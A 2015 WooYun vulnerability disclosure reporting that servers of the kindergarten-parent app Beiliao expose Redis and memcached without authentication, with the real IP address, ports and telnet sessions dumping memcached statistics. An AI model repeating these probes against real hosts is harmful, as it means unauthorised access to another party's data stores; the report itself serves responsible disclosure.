当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100807

漏洞标题:贝聊某配置不当数据库信息泄露-2

相关厂商:ibeiliao.com

漏洞作者: 爱上平顶山

提交时间:2015-03-18 09:21

修复时间:2015-05-02 14:42

公开时间:2015-05-02 14:42

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-18: 细节已通知厂商并且等待厂商处理中
2015-03-18: 厂商已经确认,细节仅向厂商公开
2015-03-28: 细节向核心白帽子及相关领域专家公开
2015-04-07: 细节向普通白帽子公开
2015-04-17: 细节向实习白帽子公开
2015-05-02: 细节向公众公开

简要描述:

贝聊
贝聊目前已有2000多家幼儿园活跃,每天30万家长登陆使用,幼儿园覆盖全国26各个省、市、自治区

详细说明:

贝聊
1、Redis
112.124.8.144 6382 未授权访问

0.png


2、memchached

1.png


root@kail:~# telnet 112.124.8.144 11211
Trying 112.124.8.144...
Connected to 112.124.8.144.
Escape character is '^]'.
stats
STAT pid 9622
STAT uptime 4431760
STAT time 1426085712
STAT version 1.4.13
STAT libevent 2.0.16-stable
STAT pointer_size 64
STAT rusage_user 80.017000
STAT rusage_system 82.741171
STAT curr_connections 5
STAT total_connections 196
STAT connection_structures 11
STAT reserved_fds 20
STAT cmd_get 39
STAT cmd_set 27
STAT cmd_flush 2
STAT cmd_touch 0
STAT get_hits 27
STAT get_misses 12
STAT delete_misses 0
STAT delete_hits 0
STAT incr_misses 0
STAT incr_hits 0
STAT decr_misses 0
STAT decr_hits 0
STAT cas_misses 0
STAT cas_hits 0
STAT cas_badval 0
STAT touch_hits 0
STAT touch_misses 0
STAT auth_cmds 0
STAT auth_errors 0
STAT bytes_read 6602
STAT bytes_written 60421
STAT limit_maxbytes 67108864
STAT accepting_conns 1
STAT listen_disabled_num 0
STAT threads 4
STAT conn_yields 0
STAT hash_power_level 16
STAT hash_bytes 524288
STAT hash_is_expanding 0
STAT expired_unfetched 0
STAT evicted_unfetched 0
STAT bytes 270
STAT curr_items 3
STAT total_items 27
STAT evictions 0
STAT reclaimed 4
END


root@kail:~# telnet 112.124.8.144 11211
Trying 112.124.8.144...
Connected to 112.124.8.144.
Escape character is '^]'.
stats items
STAT items:1:number 2
STAT items:1:age 4342169
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 4
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:2:number 1
STAT items:2:age 4343604
STAT items:2:evicted 0
STAT items:2:evicted_nonzero 0
STAT items:2:evicted_time 0
STAT items:2:outofmemory 0
STAT items:2:tailrepairs 0
STAT items:2:reclaimed 0
STAT items:2:expired_unfetched 0
STAT items:2:evicted_unfetched 0
END


ok

漏洞证明:

···

修复方案:

权限控制

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-03-18 14:41

厂商回复:

已经确认问题。非常感谢爱上平顶山的反馈。

最新状态:

暂无